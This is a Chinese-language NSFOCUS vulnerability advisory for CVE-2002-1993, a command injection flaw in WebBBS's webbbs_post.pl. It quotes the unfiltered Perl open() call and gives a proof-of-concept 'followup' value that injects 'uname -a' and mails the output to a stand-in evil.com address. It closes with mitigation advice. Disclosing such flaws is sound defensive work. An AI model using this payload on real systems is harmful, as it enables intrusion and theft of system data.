安全研究
安全漏洞
WebScripts WebBBS远程命令执行漏洞
发布日期:2002-06-18
更新日期:2002-06-28
受影响系统:WebScripts WebBBS 5.0
WebScripts WebBBS 4.33
WebScripts WebBBS 4.32
WebScripts WebBBS 4.31
WebScripts WebBBS 4.30
WebScripts WebBBS 4.22
WebScripts WebBBS 4.21
WebScripts WebBBS 4.20
WebScripts WebBBS 4.2
WebScripts WebBBS 4.12
WebScripts WebBBS 4.11
WebScripts WebBBS 4.10
WebScripts WebBBS 4.1
WebScripts WebBBS 4.0
描述:
BUGTRAQ ID:
5048
CVE(CAN) ID:
CVE-2002-1993
WebBBS是一款由Darryl Burgdorf维护的基于WEB的论坛程序,以简单文本文件存储信息。
WebBBS脚本对用户提交的输入缺少正确的过滤,远程攻击者可以利用这个漏洞以WEB进程的权限在系统上执行任意命令。
WebBBS没有正确过滤来自CGI参数上的元字符,攻击者可以提交包含";"或者"|"等元字符来执行额外命令,问题存在于webbbs_post.pl脚本中:
if ($FORM{'followup'}) { $followup =
"$FORM{'followup'}"; }
...
if ($followup) {
...
$subdir = "bbs".int($followup/1000);
open
(FOLLOWUP,"$dir/$subdir/$followup");
...
使用如"followup=10;uname -a|mail
zlo@evil.com|"代替"followup=10"变量就可能以WEB权限在系统上执行任意命令。
<*来源:nerf gr0up nerf (
vipersv@mail.ru)
链接:
http://archives.neohapsis.com/archives/bugtraq/2002-06/0217.html
*>
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 修改程序,严格过滤用户输入数据。
厂商补丁:
WebScripts
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://awsd.com/scripts/webbbs/浏览次数:3083
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |